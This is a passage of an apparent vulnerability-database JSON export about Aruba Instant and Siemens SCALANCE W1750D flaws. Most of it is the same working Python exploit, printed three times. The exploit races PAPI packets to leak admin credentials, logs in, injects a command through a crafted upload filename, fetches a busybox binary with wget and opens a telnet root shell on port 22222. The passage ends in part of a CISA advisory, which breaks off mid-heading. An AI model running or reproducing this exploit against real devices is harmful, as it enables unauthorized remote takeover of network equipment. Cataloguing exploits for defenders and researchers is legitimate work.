+= b\"\\x3B\\x7E\"\n payload += b\"\\x41\\x41\"\n payload += b\"\\x04\\x22\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x02\\x00\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\" * 12 * 4\n text_to_send = bytes()\n for i in \"msg_ref 3000 /tmp/cfg-plaintext\\x00\":\n text_to_send += struct.pack(\"B\", int(ord(i)) ^ 0x93)\n\n packet = payload + text_to_send\n\n while CONTINUE_RACE:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((ip, 8211))\n s.send(packet)\n s.close()\n time.sleep(0.004)\n\n\ndef find_credentials(text):\n res = re.search(\"mgmt-user .*\", text)[0]\n res = res.split(\" \")\n return (res[1], res[2])\n\n\ndef login(ip, username, password):\n login_data = {\n \"opcode\": \"login\",\n \"user\": username,\n \"passwd\": password,\n \"refresh\": \"false\",\n }\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=login_data, verify=False)\n\n root = ET.fromstring(res.text)\n return root.find(\"./data[@name='sid']\").text\n\n\ndef create_directory(ip, sid):\n request_data = \"opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\\\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\\\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=\".format(ip=ip, sid=sid)\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=request_data, verify=False)\n if \"/tmp/oper_\" in res.text:\n print(\"[+] Successfully created /tmp/oper_/ directory :)\")\n return True\n else:\n print(\"[-] Failed creating /tmp/oper_/ directory\")\n return False\n\n\ndef prepare_upload_id(command):\n base_payload = \"/../../etc/httpd/\"\n cmd_len = len(command)\n padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces\n if padding_len < 0:\n print(\"[-] Command too long length:{}\".format(padding_len))\n exit(1)\n return base_payload + ('/' * (padding_len - 1)) + 'A' + \"'; {} #.gz\".format(command) \n\n\ndef create_file(ip, command):\n upload_id = prepare_upload_id(command)\n requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data={\"opcode\": \"cp-upload\", \"file_type\": \"logo\", \"upload_id\": upload_id, \"sid\": \"basdfbsfbsfb\"}, files={\"file\": \"test2\"}, verify=False)\n\n\ndef run_command(ip, command):\n print(\"[*] Executing telnet\")\n command = command.replace(\"?\", \"%3F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n s = requests.Session()\n req = requests.Request('GET', \"https://{}:4343/A';%20{}%20%23\".format(ip, command))\n prep = req.prepare()\n response = s.send(prep, verify=False)\n return response.text\n\ndef build_command(command):\n command = command.replace(\"/\", \"\\\\\\\\x2F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n command = command.replace(\"\\\"\", \"\\\\\\\"\")\n command = command.replace(\"`\", \"\\`\")\n final_command = \"echo -e \\\"{}\\\"|sh\".format(command)\n return final_command\n\ndef telnet_connect(router_ip):\n print(\"[*] Connecting to telnet\")\n with telnetlib.Telnet(router_ip, 22222) as tn:\n tn.write(b\"rm /etc/httpd/A*sh*.gz\\n\")\n tn.interact()\n\n\ndef main():\n\n global CONTINUE_RACE\n\n ip = sys.argv[1]\n\n print(\"[*] Starting the PAPI race thread\")\n papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))\n papi_thread.start()\n\n while CONTINUE_RACE:\n time.sleep(0.1)\n res = requests.get(\"https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1\".format(ip), timeout=3, verify=False)\n if \"version\" in res.text:\n print(\"[+] Successfully leaked the password from config\")\n CONTINUE_RACE = False\n\n file_content = re.findall(\"var SESSION_ID = '(.*?)';\", res.text, re.S)[0]\n user, password = find_credentials(file_content)\n\n print(\"[+] Successfully extracted username: {} and password: {}\".format(user, password))\n sid = login(ip, user, password)\n print(\"[*] SID generated: {}\".format(sid))\n\n command = \"\"\"cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh\"\"\"\n final_command = build_command(command)\n\n if not create_directory(ip, sid):\n return\n\n print(\"[*] Creating malicious file in /etc/httpd/\")\n create_file(ip, final_command)\n print(run_command(ip, final_command))\n time.sleep(1) # Sleeping waiting for telnet.\n telnet_connect(ip)\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/36559", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:46:23", "description": "", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T00:00:00", "type": "zdt", "title": "Aruba Instant (IAP) - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25155", "CVE-2021-25156", "CVE-2021-25157", "CVE-2021-25158", "CVE-2021-25159", "CVE-2021-25160", "CVE-2021-25161", "CVE-2021-25162"], "modified": "2021-07-16T00:00:00", "id": "1337DAY-ID-36560", "href": "https://0day.today/exploit/description/36560", "sourceData": "Aruba Instant (IAP) - Remote Code Execution Exploit\n\nimport socket\nimport sys\nimport struct\nimport time\nimport threading\nimport urllib3\nimport re\nimport telnetlib\nimport xml.etree.ElementTree as ET\nimport requests\n\nurllib3.disable_warnings()\n\nCONTINUE_RACE = True\nSNPRINTF_CREATEFILE_MAX_LENGTH = 245\n\n\ndef race_papi_message(ip):\n\n global CONTINUE_RACE\n\n payload = b\"\\x49\\x72\"\n payload += b\"\\x00\\x03\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x3B\\x7E\"\n payload += b\"\\x41\\x41\"\n payload += b\"\\x04\\x22\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x02\\x00\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\" * 12 * 4\n text_to_send = bytes()\n for i in \"msg_ref 3000 /tmp/cfg-plaintext\\x00\":\n text_to_send += struct.pack(\"B\", int(ord(i)) ^ 0x93)\n\n packet = payload + text_to_send\n\n while CONTINUE_RACE:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((ip, 8211))\n s.send(packet)\n s.close()\n time.sleep(0.004)\n\n\ndef find_credentials(text):\n res = re.search(\"mgmt-user .*\", text)[0]\n res = res.split(\" \")\n return (res[1], res[2])\n\n\ndef login(ip, username, password):\n login_data = {\n \"opcode\": \"login\",\n \"user\": username,\n \"passwd\": password,\n \"refresh\": \"false\",\n }\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=login_data, verify=False)\n\n root = ET.fromstring(res.text)\n return root.find(\"./data[@name='sid']\").text\n\n\ndef create_directory(ip, sid):\n request_data = \"opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\\\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\\\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=\".format(ip=ip, sid=sid)\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=request_data, verify=False)\n if \"/tmp/oper_\" in res.text:\n print(\"[+] Successfully created /tmp/oper_/ directory :)\")\n return True\n else:\n print(\"[-] Failed creating /tmp/oper_/ directory\")\n return False\n\n\ndef prepare_upload_id(command):\n base_payload = \"/../../etc/httpd/\"\n cmd_len = len(command)\n padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces\n if padding_len < 0:\n print(\"[-] Command too long length:{}\".format(padding_len))\n exit(1)\n return base_payload + ('/' * (padding_len - 1)) + 'A' + \"'; {} #.gz\".format(command) \n\n\ndef create_file(ip, command):\n upload_id = prepare_upload_id(command)\n requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data={\"opcode\": \"cp-upload\", \"file_type\": \"logo\", \"upload_id\": upload_id, \"sid\": \"basdfbsfbsfb\"}, files={\"file\": \"test2\"}, verify=False)\n\n\ndef run_command(ip, command):\n print(\"[*] Executing telnet\")\n command = command.replace(\"?\", \"%3F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n s = requests.Session()\n req = requests.Request('GET', \"https://{}:4343/A';%20{}%20%23\".format(ip, command))\n prep = req.prepare()\n response = s.send(prep, verify=False)\n return response.text\n\ndef build_command(command):\n command = command.replace(\"/\", \"\\\\\\\\x2F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n command = command.replace(\"\\\"\", \"\\\\\\\"\")\n command = command.replace(\"`\", \"\\`\")\n final_command = \"echo -e \\\"{}\\\"|sh\".format(command)\n return final_command\n\ndef telnet_connect(router_ip):\n print(\"[*] Connecting to telnet\")\n with telnetlib.Telnet(router_ip, 22222) as tn:\n tn.write(b\"rm /etc/httpd/A*sh*.gz\\n\")\n tn.interact()\n\n\ndef main():\n\n global CONTINUE_RACE\n\n ip = sys.argv[1]\n\n print(\"[*] Starting the PAPI race thread\")\n papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))\n papi_thread.start()\n\n while CONTINUE_RACE:\n time.sleep(0.1)\n res = requests.get(\"https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1\".format(ip), timeout=3, verify=False)\n if \"version\" in res.text:\n print(\"[+] Successfully leaked the password from config\")\n CONTINUE_RACE = False\n\n file_content = re.findall(\"var SESSION_ID = '(.*?)';\", res.text, re.S)[0]\n user, password = find_credentials(file_content)\n\n print(\"[+] Successfully extracted username: {} and password: {}\".format(user, password))\n sid = login(ip, user, password)\n print(\"[*] SID generated: {}\".format(sid))\n\n command = \"\"\"cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh\"\"\"\n final_command = build_command(command)\n\n if not create_directory(ip, sid):\n return\n\n print(\"[*] Creating malicious file in /etc/httpd/\")\n create_file(ip, final_command)\n print(run_command(ip, final_command))\n time.sleep(1) # Sleeping waiting for telnet.\n telnet_connect(ip)\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/36560", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-05-27T14:38:57", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-07-16T00:00:00", "type": "exploitdb", "title": "Aruba Instant 8.7.1.0 - Arbitrary File Modification", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-25155", "CVE-2021-25155"], "modified": "2021-07-16T00:00:00", "id": "EDB-ID:50133", "href": "https://www.exploit-db.com/exploits/50133", "sourceData": "# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification\n# Date: 15/07/2021\n# Exploit Author: Gr33nh4t\n# Vendor Homepage: https://www.arubanetworks.com/\n# Version:\n# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below\n# Aruba Instant 6.5.x: 6.5.4.18 and below\n# Aruba Instant 8.3.x: 8.3.0.14 and below\n# Aruba Instant 8.5.x: 8.5.0.11 and below\n# Aruba Instant 8.6.x: 8.6.0.6 and below\n# Aruba Instant 8.7.x: 8.7.1.0 and below\n# Tested on: Aruba Instant\n# CVE : CVE-2021-25155\n\nimport socket\nimport sys\nimport struct\nimport time\nimport threading\nimport urllib3\nimport re\nimport telnetlib\nimport xml.etree.ElementTree as ET\nimport requests\n\nurllib3.disable_warnings()\n\nCONTINUE_RACE = True\nSNPRINTF_CREATEFILE_MAX_LENGTH = 245\n\n\ndef race_papi_message(ip):\n\n global CONTINUE_RACE\n\n payload = b\"\\x49\\x72\"\n payload += b\"\\x00\\x03\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x7F\\x00\\x00\\x01\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x3B\\x7E\"\n payload += b\"\\x41\\x41\"\n payload += b\"\\x04\\x22\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x02\\x00\"\n payload += b\"\\x00\\x00\"\n payload += b\"\\x00\" * 12 * 4\n text_to_send = bytes()\n for i in \"msg_ref 3000 /tmp/cfg-plaintext\\x00\":\n text_to_send += struct.pack(\"B\", int(ord(i)) ^ 0x93)\n\n packet = payload + text_to_send\n\n while CONTINUE_RACE:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((ip, 8211))\n s.send(packet)\n s.close()\n time.sleep(0.004)\n\n\ndef find_credentials(text):\n res = re.search(\"mgmt-user .*\", text)[0]\n res = res.split(\" \")\n return (res[1], res[2])\n\n\ndef login(ip, username, password):\n login_data = {\n \"opcode\": \"login\",\n \"user\": username,\n \"passwd\": password,\n \"refresh\": \"false\",\n }\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=login_data, verify=False)\n\n root = ET.fromstring(res.text)\n return root.find(\"./data[@name='sid']\").text\n\n\ndef create_directory(ip, sid):\n request_data = \"opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\\\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\\\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=\".format(ip=ip, sid=sid)\n res = requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data=request_data, verify=False)\n if \"/tmp/oper_\" in res.text:\n print(\"[+] Successfully created /tmp/oper_/ directory :)\")\n return True\n else:\n print(\"[-] Failed creating /tmp/oper_/ directory\")\n return False\n\n\ndef prepare_upload_id(command):\n base_payload = \"/../../etc/httpd/\"\n cmd_len = len(command)\n padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces\n if padding_len < 0:\n print(\"[-] Command too long length:{}\".format(padding_len))\n exit(1)\n return base_payload + ('/' * (padding_len - 1)) + 'A' + \"'; {} #.gz\".format(command)\n\n\ndef create_file(ip, command):\n upload_id = prepare_upload_id(command)\n requests.post(\"https://{}:4343/swarm.cgi\".format(ip), data={\"opcode\": \"cp-upload\", \"file_type\": \"logo\", \"upload_id\": upload_id, \"sid\": \"basdfbsfbsfb\"}, files={\"file\": \"test2\"}, verify=False)\n\n\ndef run_command(ip, command):\n print(\"[*] Executing telnet\")\n command = command.replace(\"?\", \"%3F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n s = requests.Session()\n req = requests.Request('GET', \"https://{}:4343/A';%20{}%20%23\".format(ip, command))\n prep = req.prepare()\n response = s.send(prep, verify=False)\n return response.text\n\ndef build_command(command):\n command = command.replace(\"/\", \"\\\\\\\\x2F\")\n command = command.replace(\"#\", \"\\\\\\\\x23\")\n command = command.replace(\"\\\"\", \"\\\\\\\"\")\n command = command.replace(\"`\", \"\\`\")\n final_command = \"echo -e \\\"{}\\\"|sh\".format(command)\n return final_command\n\ndef telnet_connect(router_ip):\n print(\"[*] Connecting to telnet\")\n with telnetlib.Telnet(router_ip, 22222) as tn:\n tn.write(b\"rm /etc/httpd/A*sh*.gz\\n\")\n tn.interact()\n\n\ndef main():\n\n global CONTINUE_RACE\n\n ip = sys.argv[1]\n\n print(\"[*] Starting the PAPI race thread\")\n papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))\n papi_thread.start()\n\n while CONTINUE_RACE:\n time.sleep(0.1)\n res = requests.get(\"https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1\".format(ip), timeout=3, verify=False)\n if \"version\" in res.text:\n print(\"[+] Successfully leaked the password from config\")\n CONTINUE_RACE = False\n\n file_content = re.findall(\"var SESSION_ID = '(.*?)';\", res.text, re.S)[0]\n user, password = find_credentials(file_content)\n\n print(\"[+] Successfully extracted username: {} and password: {}\".format(user, password))\n sid = login(ip, user, password)\n print(\"[*] SID generated: {}\".format(sid))\n\n command = \"\"\"cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh\"\"\"\n final_command = build_command(command)\n\n if not create_directory(ip, sid):\n return\n\n print(\"[*] Creating malicious file in /etc/httpd/\")\n create_file(ip, final_command)\n print(run_command(ip, final_command))\n time.sleep(1) # Sleeping waiting for telnet.\n telnet_connect(ip)\n\n\nif __name__ == \"__main__\":\n main()", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/hardware/remote/50133.py", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "ics": [{"lastseen": "2023-06-02T15:00:29", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low attack complexity\n * **Vendor: **Siemens\n * **Equipment: **SCALANCE W1750D\n * **Vulnerabilities:** Improper Authentication, Classic Buffer Overflow, Command Injection, Improper Input Validation, Race Condition, Cross-site Scripting, Basic XSS, Uncontrolled Resource Consumption\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-21-131-14 Siemens SCALANCE W1750D (Update A) that was published August 10, 2021, to the ICS webpage on us-cert.cisa.gov.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code as a privileged user on the underlying operating system, fully compromise the underlying operating system, overwrite sensitive system files, create a denial-of-service condition, execute arbitrary script code in a victim\u2019s browser, read arbitrary files off the underlying file system, create an attacker named directory, corrupt backup files, or obtain sensitive information.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of SCALANCE W1750D, a software management platform, are affected:\n\n * SCALANCE W1750D: All versions prior to 8.7.0\n\n**\\--------- Begin Update B Part 1 of 2 ---------**\n\n * SCALANCE W1750D: v8.7.0 and later and prior to v8.7.1.3 (Only affected by CVE-2020-24635, CVE-2020-24636, CVE-2021-25145, CVE-2021-25146, CVE-2021-25155, CVE-2021-25156, CVE-2021-25157, CVE-2021-25158, CVE-2021-25159, CVE-2021-25160, CVE-2021-25161, and CVE-2021-25162).\n\n**\\--------- End Update B Part 1 of 2 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n#### 4.2.1 [IMPROPER AUTHENTICATION CWE-287](<https://cwe.mitre.org/data/definitions/287.html>)\n\nAn attacker with physical access to the affected device can bypass authentication mechanisms, which may allow access to the Aruba Instant command line interface.\n\n[CVE-2019-5317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5317>) has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is ([AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.2 [BUFFER COPY WITHOUT CHECKING SIZE OF INPUT (\u2018CLASSIC BUFFER OVERFLOW') CWE-120](<https://cwe.mitre.org/data/definitions/120.html>)\n\nAn attacker may send specially crafted packets that may allow the execution of arbitrary code as a privileged user on the underlying operating system.\n\n[CVE-2019-5319](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5319>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.3 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nA command injection vulnerability exists in the Aruba Instant command line interface, which may allow an attacker to fully compromise the underlying access point operating system.\n\n[CVE-2020-24635](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24635>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.4 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nA command injection vulnerability in affected Aruba Instant versions exists, which may allow the execution of arbitrary commands as a privileged user on the underlying operating system.\n\n[CVE-2020-24636](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24636>) has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.5 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability can be exploited through the PAPI protocol, resulting in a system reboot, which may allow an attacker to create a denial-of-service condition.\n\n[CVE-2021-25143](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25143>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n#### 4.2.6 [BUFFER COPY WITHOUT CHECKING SIZE OF INPUT (\u2018CLASSIC BUFFER OVERFLOW') CWE-120](<https://cwe.mitre.org/data/definitions/120.html>)\n\nAn attacker may send specially crafted packets that may allow the execution of arbitrary code as a privileged user on the underlying operating system.\n\n[CVE-2021-25144](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25144>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.7 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn information disclosure vulnerability exists in affected Aruba Instant access points, which may allow an unauthenticated attacker in the same wired network to access sensitive information.\n\n[CVE-2021-25145](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25145>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n#### 4.2.8 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nA command injection vulnerability exists in the Aruba Instant command line interface, which may allow an attacker to fully compromise the underlying access point operating system.\n\n[CVE-2021-25146](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25146>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.9 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn attacker may overwrite an arbitrary file with attacker-controlled content via the command line interface, which may allow overwriting of sensitive system files.\n\n[CVE-2021-25148](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25148>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.10 [BUFFER COPY WITHOUT CHECKING SIZE OF INPUT (\u2018CLASSIC BUFFER OVERFLOW') CWE-120](<https://cwe.mitre.org/data/definitions/120.html>)\n\nAn attacker may send specially crafted packets that may allow the execution of arbitrary code as a privileged user on the underlying operating system.\n\n[CVE-2021-25149](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25149>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.11 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nA command injection vulnerability exists in the Aruba Instant command line interface, which may allow an attacker to fully compromise the underlying host operating system.\n\n[CVE-2021-25150](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25150>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.12 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn attacker can overwrite an arbitrary file with attacker-controlled content via the web UI that may allow overwriting of sensitive system files.\n\n[CVE-2021-25155](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25155>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.13 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn arbitrary directory creation vulnerability exists in affected Aruba Instant hosts, which may allow a directory to be created with the directory name controlled by the attacker.\n\n[CVE-2021-25156](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25156>) has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 4.2.14 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn arbitrary file read vulnerability exists in affected Aruba Instant hosts, which may allow an attacker to read any file off the underlying file system, including sensitive system files.\n\n[CVE-2021-25157](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25157>) has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 4.2.15 [CONCURRENT EXECUTION USING SHARED 